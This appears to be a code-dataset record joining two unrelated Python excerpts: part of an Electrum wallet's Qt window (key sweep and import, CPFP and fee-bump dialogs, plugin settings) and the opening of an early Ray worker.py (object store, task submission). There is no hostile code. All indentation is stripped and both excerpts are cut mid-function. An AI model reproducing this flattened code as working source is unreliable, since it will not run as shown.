valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def _rbf_dialog(self, tx: Transaction, func, title, help_text):
txid = tx.txid()
assert txid
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
fee = tx.get_fee()
assert fee is not None
tx_label = self.wallet.get_label_for_txid(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, title)
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(help_text))
ok_button = OkButton(d)
warning_label = WWLabel('\n')
warning_label.setStyleSheet(ColorScheme.RED.as_stylesheet())
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
def on_feerate():
fee_rate = feerate_e.get_amount()
warning_text = '\n'
if fee_rate is not None:
try:
new_tx = func(fee_rate)
except Exception as e:
new_tx = None
warning_text = str(e).replace('\n',' ')
else:
new_tx = None
ok_button.setEnabled(new_tx is not None)
warning_label.setText(warning_text)
feerate_e.textChanged.connect(on_feerate)
def on_slider(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
feerate_e.textEdited.connect(fee_slider.deactivate)
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
grid.addWidget(feerate_e, 2, 1)
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addWidget(warning_label)
vbox.addLayout(Buttons(CancelButton(d), ok_button))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = func(new_fee_rate)
except Exception as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def bump_fee_dialog(self, tx: Transaction):
title = _('Bump Fee')
help_text = _("Increase your transaction's fee to improve its position in mempool.")
def func(new_fee_rate):
return self.wallet.bump_fee(
tx=tx,
txid=tx.txid(),
new_fee_rate=new_fee_rate,
coins=self.get_coins())
self._rbf_dialog(tx, func, title, help_text)
def dscancel_dialog(self, tx: Transaction):
title = _('Cancel transaction')
help_text = _(
"Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")
def func(new_fee_rate):
return self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
self._rbf_dialog(tx, func, title, help_text)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
worker.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import collections
import colorama
import copy
import hashlib
import inspect
import json
import numpy as np
import os
import redis
import signal
import sys
import threading
import time
import traceback
# Ray modules
import pyarrow
import pyarrow.plasma as plasma
import ray.cloudpickle as pickle
import ray.experimental.state as state
import ray.serialization as serialization
import ray.services as services
import ray.signature as signature
import ray.local_scheduler
import ray.plasma
from ray.utils import (FunctionProperties, random_string, binary_to_hex,
is_cython)
SCRIPT_MODE = 0
WORKER_MODE = 1
PYTHON_MODE = 2
SILENT_MODE = 3
LOG_POINT = 0
LOG_SPAN_START = 1
LOG_SPAN_END = 2
ERROR_KEY_PREFIX = b"Error:"
DRIVER_ID_LENGTH = 20
ERROR_ID_LENGTH = 20
# This must match the definition of NIL_ACTOR_ID in task.h.
NIL_ID = 20 * b"\xff"
NIL_LOCAL_SCHEDULER_ID = NIL_ID
NIL_FUNCTION_ID = NIL_ID
NIL_ACTOR_ID = NIL_ID
NIL_ACTOR_HANDLE_ID = NIL_ID
# This must be kept in sync with the `error_types` array in
# common/state/error_table.h.
OBJECT_HASH_MISMATCH_ERROR_TYPE = b"object_hash_mismatch"
PUT_RECONSTRUCTION_ERROR_TYPE = b"put_reconstruction"
# This must be kept in sync with the `scheduling_state` enum in common/task.h.
TASK_STATUS_RUNNING = 8
# Default resource requirements for remote functions.
DEFAULT_REMOTE_FUNCTION_CPUS = 1
DEFAULT_REMOTE_FUNCTION_GPUS = 0
# Default resource requirements for actors when no resource requirements are
# specified.
DEFAULT_ACTOR_METHOD_CPUS_SIMPLE_CASE = 1
DEFAULT_ACTOR_CREATION_CPUS_SIMPLE_CASE = 0
# Default resource requirements for actors when some resource requirements are
# specified.
DEFAULT_ACTOR_METHOD_CPUS_SPECIFIED_CASE = 0
DEFAULT_ACTOR_CREATION_CPUS_SPECIFIED_CASE = 1
DEFAULT_ACTOR_CREATION_GPUS_SPECIFIED_CASE = 0
class FunctionID(object):
def __init__(self, function_id):
self.function_id = function_id
def id(self):
return self.function_id
class RayTaskError(Exception):
"""An object used internally to represent a task that threw an exception.
If a task throws an exception during execution, a RayTaskError is stored in
the object store for each of the task's outputs. When an object is
retrieved from the object store, the Python method that retrieved it checks
to see if the object is a RayTaskError and if it is then an exception is
thrown propagating the error message.
Currently, we either use the exception attribute or the traceback attribute
but not both.
Attributes:
function_name (str): The name of the function that failed and produced
the RayTaskError.
exception (Exception): The exception object thrown by the failed task.
traceback_str (str): The traceback from the exception.
"""
def __init__(self, function_name, exception, traceback_str):
"""Initialize a RayTaskError."""
self.function_name = function_name
if (isinstance(exception, RayGetError) or
isinstance(exception, RayGetArgumentError)):
self.exception = exception
else:
self.exception = None
self.traceback_str = traceback_str
def __str__(self):
"""Format a RayTaskError as a string."""
if self.traceback_str is None:
# This path is taken if getting the task arguments failed.
return ("Remote function {}{}{} failed with:\n\n{}"
.format(colorama.Fore.RED, self.function_name,
colorama.Fore.RESET, self.exception))
else:
# This path is taken if the task execution failed.
return ("Remote function {}{}{} failed with:\n\n{}"
.format(colorama.Fore.RED, self.function_name,
colorama.Fore.RESET, self.traceback_str))
class RayGetError(Exception):
"""An exception used when get is called on an output of a failed task.
Attributes:
objectid (lib.ObjectID): The ObjectID that get was called on.
task_error (RayTaskError): The RayTaskError object created by the
failed task.
"""
def __init__(self, objectid, task_error):
"""Initialize a RayGetError object."""
self.objectid = objectid
self.task_error = task_error
def __str__(self):
"""Format a RayGetError as a string."""
return ("Could not get objectid {}. It was created by remote function "
"{}{}{} which failed with:\n\n{}"
.format(self.objectid, colorama.Fore.RED,
self.task_error.function_name, colorama.Fore.RESET,
self.task_error))
class RayGetArgumentError(Exception):
"""An exception used when a task's argument was produced by a failed task.
Attributes:
argument_index (int): The index (zero indexed) of the failed argument
in present task's remote function call.
function_name (str): The name of the function for the current task.
objectid (lib.ObjectID): The ObjectID that was passed in as the
argument.
task_error (RayTaskError): The RayTaskError object created by the
failed task.
"""
def __init__(self, function_name, argument_index, objectid, task_error):
"""Initialize a RayGetArgumentError object."""
self.argument_index = argument_index
self.function_name = function_name
self.objectid = objectid
self.task_error = task_error
def __str__(self):
"""Format a RayGetArgumentError as a string."""
return ("Failed to get objectid {} as argument {} for remote function "
"{}{}{}. It was created by remote function {}{}{} which "
"failed with:\n{}".format(self.objectid, self.argument_index,
colorama.Fore.RED,
self.function_name,
colorama.Fore.RESET,
colorama.Fore.RED,
self.task_error.function_name,
colorama.Fore.RESET,
self.task_error))
class Worker(object):
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
functions (Dict[str, Callable]): A dictionary mapping the name of a
remote function to the remote function itself. This is the set of
remote functions that can be executed by this worker.
connected (bool): True if Ray has been started and False otherwise.
mode: The mode of the worker. One of SCRIPT_MODE, PYTHON_MODE,
SILENT_MODE, and WORKER_MODE.
cached_remote_functions_and_actors: A list of information for exporting
remote functions and actor classes definitions that were defined
before the worker called connect. When the worker eventually does
call connect, if it is a driver, it will export these functions and
actors. If cached_remote_functions_and_actors is None, that means
that connect has been called already.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
# The functions field is a dictionary that maps a driver ID to a
# dictionary of functions that have been registered for that driver
# (this inner dictionary maps function IDs to a tuple of the function
# name and the function itself). This should only be used on workers
# that execute remote functions.
self.functions = collections.defaultdict(lambda: {})
# The function_properties field is a dictionary that maps a driver ID
# to a dictionary of functions that have been registered for that
# driver (this inner dictionary maps function IDs to a tuple of the
# number of values returned by that function, the number of CPUs
# required by that function, and the number of GPUs required by that
# function). This is used when submitting a function (which can be done
# both on workers and on drivers).
self.function_properties = collections.defaultdict(lambda: {})
# This is a dictionary mapping driver ID to a dictionary that maps
# remote function IDs for that driver to a counter of the number of
# times that remote function has been executed on this worker. The
# counter is incremented every time the function is executed on this
# worker. When the counter reaches the maximum number of executions
# allowed for a particular function, the worker is killed.
self.num_task_executions = collections.defaultdict(lambda: {})
self.connected = False
self.mode = None
self.cached_remote_functions_and_actors = []
self.cached_functions_to_run = []
self.fetch_and_register_actor = None
self.make_actor = None
self.actors = {}
self.actor_task_counter = 0
# A set of all of the actor class keys that have been imported by the
# import thread. It is safe to convert this worker into an actor of
# these types.
self.imported_actor_classes = set()
# The number of threads Plasma should use when putting an object in the
# object store.
self.memcopy_threads = 12
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray.utils.get_cuda_visible_devices()
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode PYTHON_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will insead execute them in a blocking fashion.
The mode SILENT_MODE should be used only during testing. It does not
print any information about errors because some of the tests
intentionally fail.
args:
mode: One of SCRIPT_MODE, WORKER_MODE, PYTHON_MODE, and
SILENT_MODE.
"""
self.mode = mode
def store_and_register(self, object_id, value, depth=100):
"""Store an object and attempt to register its class if needed.
Args:
object_id: The ID of the object to store.
value: The value to put in the object store.
depth: The maximum number of classes to recursively register.
Raises:
Exception: An exception is raised if the attempt to store the
object fails. This can happen if there is already an object
with the same ID in the object store or if the object store is
full.
"""
counter = 0
while True:
if counter == depth:
raise Exception("Ray exceeded the maximum number of classes "
"that it will recursively serialize when "
"attempting to serialize an object of "
"type {}.".format(type(value)))
counter += 1
try:
self.plasma_client.put(
value,
object_id=pyarrow.plasma.ObjectID(object_id.id()),
memcopy_threads=self.memcopy_threads,
serialization_context=self.serialization_context)
break
except pyarrow.SerializationCallbackError as e:
try:
register_custom_serializer(type(e.example_object),
use_dict=True)
warning_message = ("WARNING: Serializing objects of type "
"{} by expanding them as dictionaries "
"of their fields. This behavior may "
"be incorrect in some cases."
.format(type(e.example_object)))
print(warning_message)
except (serialization.RayNotDictionarySerializable,
serialization.CloudPickleError,
pickle.pickle.PicklingError,
Exception):
# We also handle generic exceptions here because
# cloudpickle can fail with many different types of errors.
try:
register_custom_serializer(type(e.example_object),
use_pickle=True)
warning_message = ("WARNING: Falling back to "
"serializing objects of type {} by "
"using pickle. This may be "
"inefficient."
.format(type(e.example_object)))
print(warning_message)
except serialization.CloudPickleError:
register_custom_serializer(type(e.example_object),
use_pickle=True,
local=True)
warning_message = ("WARNING: Pickling the class {} "
"failed, so we are using pickle "
"and only registering the class "
"locally."
.format(type(e.example_object)))
print(warning_message)
def put_object(self, object_id, value):
"""Put value in the local object store with object id objectid.
This assumes that the value for objectid has not yet been placed in the
local object store.
Args:
object_id (object_id.ObjectID): The object ID of the value to be
put.
value: The value to put in the object store.
Raises:
Exception: An exception is raised if the attempt to store the
object fails. This can happen if there is already an object
with the same ID in the object store or if the object store is
full.
"""
# Make sure that the value is not an object ID.
if isinstance(value, ray.local_scheduler.ObjectID):
raise Exception("Calling 'put' on an ObjectID is not allowed "
"(similarly, returning an ObjectID from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ObjectID in a list and "
"call 'put' on it (or return it).")
if isinstance(value, ray.actor.ActorHandleParent):
raise Exception("Calling 'put' on an actor handle is currently "
"not allowed (similarly, returning an actor "
"handle from a remote function is not allowed).")
# Serialize and put the object in the object store.
try:
self.store_and_register(object_id, value)
except pyarrow.PlasmaObjectExists as e:
# The object already exists in the object store, so there is no
# need to add it again. TODO(rkn): We need to compare the hashes
# and make sure that the objects are in fact the same. We also
# should return an error code to the caller instead of printing a
# message.
print("The object with ID {} already exists in the object store."
.format(object_id))
def retrieve_and_deserialize(self, object_ids, timeout, error_timeout=10):
start_time = time.time()
# Only send the warning once.
warning_sent = False
while True:
try:
# We divide very large get requests into smaller get requests
# so that a single get request doesn't block the store for a
# long time, if the store is blocked, it can block the manager
# as well as a consequence.
results = []
for i in range(0, len(object_ids),
ray._config.worker_get_request_size()):
results += self.plasma_client.get(
object_ids[i:(i +
ray._config.worker_get_request_size())],
timeout,
self.serialization_context)
return results
except pyarrow.lib.ArrowInvalid as e:
# TODO(ekl): the local scheduler could include relevant
# metadata in the task kill case for a better error message
invalid_error = RayTaskError(
"<unknown>", None,
"Invalid return value: likely worker died or was killed "
"while executing the task.")
return [invalid_error] * len(object_ids)
except pyarrow.DeserializationCallbackError as e:
# Wait a little bit for the import thread to import the class.
# If we currently have the worker lock, we need to release it
# so that the import thread can acquire it.
if self.mode == WORKER_MODE:
self.lock.release()
time.sleep(0.01)
if self.mode == WORKER_MODE:
self.lock.acquire()
if time.time() - start_time > error_timeout:
warning_message = ("This worker or driver is waiting to "
"receive a class definition so that it "
"can deserialize an object from the "
"object store. This may be fine, or it "
"may be a bug.")
if not warning_sent:
ray.utils.push_error_to_driver(
self.redis_client, "wait_for_class",
warning_message,
driver_id=self.task_driver_id.id())
warning_sent = True
def get_object(self, object_ids):
"""Get the value or values in the object store associated with the IDs.
Return the values from the local object store for object_ids. This will
block until all the values for object_ids have been written to the
local object store.
Args:
object_ids (List[object_id.ObjectID]): A list of the object IDs
whose values should be retrieved.
"""
# Make sure that the values are object IDs.
for object_id in object_ids:
if not isinstance(object_id, ray.local_scheduler.ObjectID):
raise Exception("Attempting to call `get` on the value {}, "
"which is not an ObjectID.".format(object_id))
# Do an initial fetch for remote objects. We divide the fetch into
# smaller fetches so as to not block the manager for a prolonged period
# of time in a single call.
plain_object_ids = [plasma.ObjectID(object_id.id())
for object_id in object_ids]
for i in range(0, len(object_ids),
ray._config.worker_fetch_request_size()):
self.plasma_client.fetch(
plain_object_ids[i:(i +
ray._config.worker_fetch_request_size())])
# Get the objects. We initially try to get the objects immediately.
final_results = self.retrieve_and_deserialize(plain_object_ids, 0)
# Construct a dictionary mapping object IDs that we haven't gotten yet
# to their original index in the object_ids argument.
unready_ids = dict((plain_object_ids[i].binary(), i) for (i, val) in
enumerate(final_results)
if val is plasma.ObjectNotAvailable)
was_blocked = (len(unready_ids) > 0)
# Try reconstructing any objects we haven't gotten yet. Try to get them
# until at least get_timeout_milliseconds milliseconds passes, then
# repeat.
while len(unready_ids) > 0:
for unready_id in unready_ids:
self.local_scheduler_client.reconstruct_object(unready_id)
# Do another fetch for objects that aren't available locally yet,
# in case they were evicted since the last fetch. We divide the
# fetch into smaller fetches so as to not block the manager for a
# prolonged period of time in a single call.
object_ids_to_fetch = list(map(
plasma.ObjectID, unready_ids.keys()))
for i in range(0, len(object_ids_to_fetch),
ray._config.worker_fetch_request_size()):
self.plasma_client.fetch(
object_ids_to_fetch[i:(
i + ray._config.worker_fetch_request_size())])
results = self.retrieve_and_deserialize(
object_ids_to_fetch,
max([ray._config.get_timeout_milliseconds(),
int(0.01 * len(unready_ids))]))
# Remove any entries for objects we received during this iteration
# so we don't retrieve the same object twice.
for i, val in enumerate(results):
if val is not plasma.ObjectNotAvailable:
object_id = object_ids_to_fetch[i].binary()
index = unready_ids[object_id]
final_results[index] = val
unready_ids.pop(object_id)
# If there were objects that we weren't able to get locally, let the
# local scheduler know that we're now unblocked.
if was_blocked:
self.local_scheduler_client.notify_unblocked()
assert len(final_results) == len(object_ids)
return final_results
def submit_task(self, function_id, args, actor_id=None,
actor_handle_id=None, actor_counter=0,
is_actor_checkpoint_method=False, actor_creation_id=None,
actor_creation_dummy_object_id=None,
execution_dependencies=None, num_return_vals=None,
num_cpus=None, num_gpus=None, resources=None):
"""Submit a remote task to the scheduler.
Tell the scheduler to schedule the execution of the function with ID
function_id with arguments args. Retrieve object IDs for the outputs of
the function from the scheduler and immediately return them.
Args:
function_id: The ID of the function to execute.
args: The arguments to pass into the function. Arguments can be
object IDs or they can be values. If they are values, they must
be serializable objecs.
actor_id: The ID of the actor that this task is for.
actor_counter: The counter of the actor task.
is_actor_checkpoint_method: True if this is an actor checkpoint
task and false otherwise.
actor_creation_id: The ID of the actor to create, if this is an
actor creation task.
actor_creation_dummy_object_id: If this task is an actor method,
then this argument is the dummy object ID associated with the
actor creation task for the corresponding actor.
execution_dependencies: The execution dependencies for this task.
num_return_vals: The number of return values this function should
have.
num_cpus: The number of CPUs required by this task.
num_gpus: The number of GPUs required by this task.
resources: The resource requirements for this task.
Returns:
The return object IDs for this task.
"""
with log_span("ray:submit_task", worker=self):
check_main_thread()
if actor_id is None:
assert actor_handle_id is None
actor_id = ray.local_scheduler.ObjectID(NIL_ACTOR_ID)
actor_handle_id = ray.local_scheduler.ObjectID(
NIL_ACTOR_HANDLE_ID)
else:
assert actor_handle_id is not None
if actor_creation_id is None:
actor_creation_id = ray.local_scheduler.ObjectID(NIL_ACTOR_ID)
if actor_creation_dummy_object_id is None:
actor_creation_dummy_object_id = (
ray.local_scheduler.ObjectID(NIL_ID))
# Put large or complex arguments that are passed by value in the
# object store first.
args_for_local_scheduler = []
for arg in args:
if isinstance(arg, ray.local_scheduler.ObjectID):
args_for_local_scheduler.append(arg)
elif isinstance(arg, ray.actor.ActorHandleParent):
args_for_local_scheduler.append(put(
ray.actor.wrap_actor_handle(arg)))
elif ray.local_scheduler.check_simple_value(arg):
args_for_local_scheduler.append(arg)
else:
args_for_local_scheduler.append(put(arg))
# By default, there are no execution dependencies.
if execution_dependencies is None:
execution_dependencies = []
# Look up the various function properties.
function_properties = self.function_properties[
self.task_driver_id.id()][function_id.id()]
if num_return_vals is None:
num_return_vals = function_properties.num_return_vals
if resources is None and num_cpus is None and num_gpus is None:
resources = function_properties.resources
else:
resources = {} if resources is None else resources
if "CPU" in resources or "GPU" in resources:
raise ValueError("The resources dictionary must not "
"contain the keys 'CPU' or 'GPU'")
resources["CPU"] = num_cpus
resources["GPU"] = num_gpus
# Submit the task to local scheduler.
task = ray.local_scheduler.Task(
self.task_driver_id,
ray.local_scheduler.ObjectID(function_id.id()),
args_for_local_scheduler,
num_return_vals,
self.current_task_id,
self.task_index,
actor_creation_id,
actor_creation_dummy_object_id,
actor_id,
actor_handle_id,
actor_counter,
is_actor_checkpoint_method,
execution_dependencies,
resources)
# Increment the worker's task index to track how many tasks have
# been submitted by the current task so far.
self.task_index += 1
self.local_scheduler_client.submit(task)
return task.returns()
def run_function_on_all_workers(self, function):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
should not take any arguments. If it returns anything, its
return values will not be used.
"""
check_main_thread()
# If ray.init has not been called yet, then cache the function and
